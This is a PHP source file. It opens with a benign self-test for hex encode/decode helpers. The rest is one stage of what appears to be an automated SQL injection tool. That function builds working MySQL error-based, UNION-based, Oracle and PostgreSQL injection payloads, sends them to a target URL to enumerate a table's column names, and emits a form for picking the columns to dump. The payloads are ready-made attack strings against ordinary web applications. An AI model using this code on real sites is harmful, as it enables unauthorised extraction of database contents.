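/**
 * Self-test for the hex codec helpers (hexEncode, hexEncodeUpper, hexDecode,
 * hexDecodeLower, hexDecodeUpper), which are defined elsewhere in this file.
 *
 * Encodes every byte value 0..255, prints both encodings, checks that each
 * decoder that should accept the input reproduces the 256 bytes exactly, and
 * then checks that the case-specific decoders reject the wrong case.  Results
 * are printed as they are produced; the function ends with a PASSED/FAILED line.
 *
 * @return bool true when at least one check failed (note: "has errors", not
 *              "passed"), matching the original contract callers rely on
 */
function testHex() {
    $hasErrors = false;

    // One copy of every byte value, so the round trip covers the whole alphabet.
    $allBytes = '';
    for ($i = 0; $i < 256; $i++) {
        $allBytes .= chr($i);
    }

    $allBytesHex = hexEncode($allBytes);
    printf("hexEncode(allBytes) = %s\n", $allBytesHex);
    $allBytesHexUpper = hexEncodeUpper($allBytes);
    printf("hexEncodeUpper(allBytes) = %s\n\n", $allBytesHexUpper);

    // Decodes that must succeed and give back the original 256 bytes.
    $roundTrips = array(
        array('label' => 'hexDecode(allBytesHexLower)',      'decoder' => 'hexDecode',      'input' => $allBytesHex),
        array('label' => 'hexDecode(allBytesHexUpper)',      'decoder' => 'hexDecode',      'input' => $allBytesHexUpper),
        array('label' => 'hexDecodeLower(allBytesHexLower)', 'decoder' => 'hexDecodeLower', 'input' => $allBytesHex),
        array('label' => 'hexDecodeUpper(allBytesHexUpper)', 'decoder' => 'hexDecodeUpper', 'input' => $allBytesHexUpper),
    );
    foreach ($roundTrips as $case) {
        $decoder = $case['decoder'];
        $decoded = $decoder($case['input']);
        printf("%s ret = %u: ", $case['label'], $decoded === false ? 1 : 0);
        // A false return is reported as "bad" without indexing a non-string.
        $good = testHexIsAllBytes($decoded);
        if (!$good) {
            $hasErrors = true;
        }
        printf("%s\n", $good ? "good" : "bad");
    }

    // Decodes that must be rejected: wrong case for a case-specific decoder.
    printf("\nShould error:\n");
    $mustReject = array(
        array('label' => 'hexDecodeLower(allBytesHexUpper)', 'decoder' => 'hexDecodeLower', 'input' => $allBytesHexUpper),
        array('label' => 'hexDecodeUpper(allBytesHexLower)', 'decoder' => 'hexDecodeUpper', 'input' => $allBytesHex),
    );
    foreach ($mustReject as $case) {
        $decoder = $case['decoder'];
        $decoded = $decoder($case['input']);
        $rejected = $decoded === false;
        // The original format string had no %s for the good/bad argument, so
        // the verdict was silently dropped from the output; print it.
        printf("%s ret = %u: %s\n", $case['label'], $rejected ? 1 : 0, $rejected ? "good" : "bad");
        if (!$rejected) {
            $hasErrors = true;
        }
    }

    if ($hasErrors) {
        printf("*** FAILED ***\n");
    } else {
        printf("*** PASSED ***\n");
    }
    return $hasErrors;
}

/**
 * True when $decoded is exactly the 256-byte string whose byte at offset i is
 * chr(i).  Anything that is not a 256-byte string (a false decode result, a
 * short or long result) is a mismatch; this avoids the string-offset warnings
 * the plain loop produced when the decoder returned false.
 *
 * @param mixed $decoded value returned by one of the hex decoders
 * @return bool
 */
function testHexIsAllBytes($decoded) {
    if (!is_string($decoded) || strlen($decoded) !== 256) {
        return false;
    }
    for ($i = 0; $i < 256; $i++) {
        if (ord($decoded[$i]) !== $i) {
            return false;
        }
    }
    return true;
}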
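/**
 * Frame 4 of the injection workflow: ask the target how many columns the
 * chosen table has, fetch the column names one request at a time, and emit a
 * form (posted to ?frame=15) in which the operator ticks the columns to dump.
 *
 * Reads the previous frame's POST fields:
 *   columnas  technique selector: 'columns e-b' (MySQL error-based),
 *             'columns u-q' (MySQL UNION), 'columns o-eb' (Oracle error-based)
 *             or 'columns pg' (PostgreSQL error-based)
 *   url       target URL prefix the payload is appended to
 *   nombre    table name; the MySQL variants splice it in verbatim, the
 *             Oracle/PostgreSQL variants pass it through asciiEncode + CHRize
 *   database  schema name as it should appear in the MySQL WHERE clause
 *   lol       1-based index into the technique's template array ($a/$b/$c/$d)
 *   sobras    trailing string appended after the payload
 *
 * $a, $b, $c, $d hold the request templates and $payload_error,
 * $payload_union, $payload_oracle, $payload_postgre the placeholder token
 * each template contains; all are file-level globals defined elsewhere.
 *
 * The SQL built here is sent to the target on purpose - that is the tool's
 * job.  What must not be trusted is what comes BACK: the column names are
 * produced by the target, and a hostile target could return markup that runs
 * in the operator's browser.  Every value echoed into the page (operator
 * input, PHP_SELF and target responses) is therefore HTML-escaped; browsers
 * decode the entities again, so the hidden fields still post the same values.
 */
function frame4() {
    html_header();
    global $a, $payload_error, $b, $payload_union, $c, $payload_oracle, $d, $payload_postgre;
    if (!isset($_POST['columnas'])) {
        return;
    }

    $url = $_POST["url"];
    $table_n = $_POST['nombre'];
    $database = $_POST['database'];
    // Template index; a non-numeric value used to reach the arrays as-is.
    $vuln_index = (int) $_POST["lol"];
    $sobras = $_POST['sobras'];
    $tabla = asciiEncode($table_n);

    // Which template array each technique indexes into.
    $templatesByMode = array(
        'columns e-b'  => $a,
        'columns u-q'  => $b,
        'columns o-eb' => $c,
        'columns pg'   => $d,
    );
    $columnas = $_POST['columnas'];
    if (!is_string($columnas) || !array_key_exists($columnas, $templatesByMode)) {
        echo "Unknown column technique.";
        return;
    }
    if (!isset($templatesByMode[$columnas][$vuln_index - 1])) {
        // Previously this silently produced a null template and sent garbage.
        echo "Invalid injection index.";
        return;
    }
    $query = $templatesByMode[$columnas][$vuln_index - 1];

    // Per technique: $querys is the request that leaks the column COUNT,
    // $query_n the request that leaks one column NAME and contains a literal
    // "$i" placeholder, $i the first index, $countOffset how the reported
    // count maps to the last index, $datos the label of the next frame's button.
    switch ($columnas) {
        case 'columns e-b':
            // MySQL, error-based (duplicate-key trick on CHARACTER_SETS).
            $querys = str_replace($payload_error, "(SELECT+1906+FROM(SELECT+COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT+MID((IFnull(CAST(COUNT(%2A)+AS+CHAR),0x20)),1,50)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name%3D" . $table_n . "+AND+table_schema%3D" . $database . "),0x3a70687a3a,floor(rand(0)%2A2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)", $query);
            $query_n = str_replace($payload_error, '(SELECT%205724%20FROM(SELECT%20COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT%20MID((IFnull(CAST(column_name%20AS%20CHAR),0x20)),1,50)%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D' . $table_n . '%20AND%20table_schema%3D' . $database . '%20LIMIT%20$i,1),0x3a70687a3a,floor(rand(0)%2A2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)', $query);
            $i = 0;
            $countOffset = -1;
            $datos = "data e-b";
            break;
        case 'columns u-q':
            // MySQL, UNION-based; the FROM clause is spliced in where the
            // template's trailing "%23" (comment) sits.
            $querys = str_replace($payload_union, "CONCAT(0x3a6f79753a,IFnull(CAST(COUNT(*)%20AS%20CHAR),0x20),0x3a70687a3a)", $query);
            $querys = str_replace("%23", "%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D" . $table_n . "%20AND%20table_schema%3D" . $database . "%23", $querys);
            $query_n = str_replace($payload_union, '(SELECT%20CONCAT(0x3a6f79753a,IFnull(CAST(column_name%20AS%20CHAR),0x20),0x3a70687a3a)%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D' . $table_n . '%20AND%20table_schema%3D' . $database . '%20LIMIT%20$i,1)', $query);
            $i = 0;
            $countOffset = -1;
            $datos = "data u-q";
            break;
        case 'columns o-eb':
            // Oracle, error-based; table name as a CHR() literal, ROWNUM is 1-based.
            $table_n3 = CHRize($tabla);
            $querys = str_replace($payload_oracle, "(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20NVL(CAST(COUNT(*)%20AS%20VARCHAR(4000))%2CCHR(32))%20FROM%20SYS.ALL_TAB_COLUMNS%20WHERE%20TABLE_NAME%3D" . $table_n3 . ")%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))", $query);
            $query_n = str_replace($payload_oracle, '(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20NVL(CAST(COLUMN_NAME%20AS%20VARCHAR(4000))%2CCHR(32))%20FROM%20(SELECT%20COLUMN_NAME%2CDATA_TYPE%2CROWNUM%20AS%20LIMIT%20FROM%20SYS.ALL_TAB_COLUMNS%20WHERE%20TABLE_NAME%3D' . $table_n3 . '%20ORDER%20BY%201%20ASC)%20WHERE%20LIMIT%3D$i)%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))', $query);
            $i = 1;
            $countOffset = 0;
            $datos = "data o-eb";
            break;
        default: // 'columns pg'
            // PostgreSQL, error-based; catalog walk limited to the "public" schema.
            $table_n3 = CHRize($tabla);
            $querys = str_replace($payload_postgre, "(SELECT%20COALESCE(CAST(COUNT(*)%20AS%20CHARACTER(10000))%2C(CHR(32)))%20FROM%20pg_namespace,pg_type,pg_attribute%20b%20JOIN%20pg_class%20a%20ON%20a.oid%3Db.attrelid%20WHERE%20a.relnamespace%3Dpg_namespace.oid%20AND%20pg_type.oid%3Db.atttypid%20AND%20attnum>0%20AND%20a.relname%3D(" . $table_n3 . ")%20AND%20nspname%3D(CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99)))", $query);
            $query_n = str_replace($payload_postgre, '(SELECT%20COALESCE(CAST(attname%20AS%20CHARACTER(10000)),(CHR(32)))%20FROM%20pg_namespace,pg_type,pg_attribute%20b%20JOIN%20pg_class%20a%20ON%20a.oid%3Db.attrelid%20WHERE%20a.relnamespace%3Dpg_namespace.oid%20AND%20pg_type.oid%3Db.atttypid%20AND%20attnum%3E0%20AND%20a.relname%3D(' . $table_n3 . ')%20AND%20nspname%3D(CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99))%20OFFSET%20$i%20LIMIT%201)', $query);
            $i = 0;
            $countOffset = -1;
            $datos = "data pg";
            break;
    }

    // PHP_SELF reflects the request path (including PATH_INFO) and must be
    // escaped like any other untrusted value before it lands in an attribute.
    echo "\n\t\t\t\t<form action=\"" . frame4Escape($_SERVER['PHP_SELF']) . "?frame=15\" target=\"_blank\" method=\"post\" name=\"datos\" id=\"datos\">\n\t\t\t\t<input type=\"hidden\" name=\"url\" id=\"url\" value=\"" . frame4Escape($url) . "\"/>\n\t\t\t\t\t<input type=\"hidden\" name=\"sobras\" id=\"sobras\" value=\"" . frame4Escape($sobras) . "\"/>\n\t\t\t\t\t<input type=\"hidden\" name=\"database\" id=\"database\" value=\"" . frame4Escape($database) . "\"/>\n\t\t\t\t<input type=\"hidden\" name=\"tn\" id=\"tn\" value=\"" . frame4Escape($tabla) . "\"/>\n\t\t\t\t";

    // One request for the column count; a non-numeric answer (extraction
    // failed) used to become a warning or, on PHP 8, a TypeError in the
    // arithmetic below.  Treat it as "no columns" and say so.
    $rawCount = GetBetween(get_url($url . $querys . $sobras));
    if (is_numeric($rawCount)) {
        $count = (int) $rawCount + $countOffset;
    } else {
        echo "Could not read the column count from the target.<br>";
        $count = $i - 1;
    }

    // One request per column name.  The name is target-controlled data, so it
    // is escaped for the text node; the value carries it hex-encoded.
    while ($i <= $count) {
        $query_nombre = str_replace('$i', (string) $i, $query_n);
        $nombre = GetBetween(get_url($url . $query_nombre . $sobras));
        echo "<input type=\"checkbox\" name=\"nombre[]\" id=\"nombre\" value=\"" . frame4Escape(hexEncode($nombre)) . "\">" . frame4Escape($nombre) . "</input><br>";
        $i++;
    }
    echo "<input type=\"hidden\" name=\"lol\" id=\"lol\" value=\"" . frame4Escape($vuln_index) . "\"/>";
    echo "<input type=\"submit\" name=\"datos\" id=\"datos\" value=\"" . frame4Escape($datos) . "\"/>";
    echo "</form>";
}

/**
 * Escape a value for an HTML text node or a double-quoted attribute.
 * Invalid UTF-8 sequences are replaced (ENT_SUBSTITUTE) instead of making
 * htmlspecialchars return an empty string, which would blank a column name.
 *
 * @param mixed $value scalar to escape; cast to string
 * @return string
 */
function frame4Escape($value) {
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}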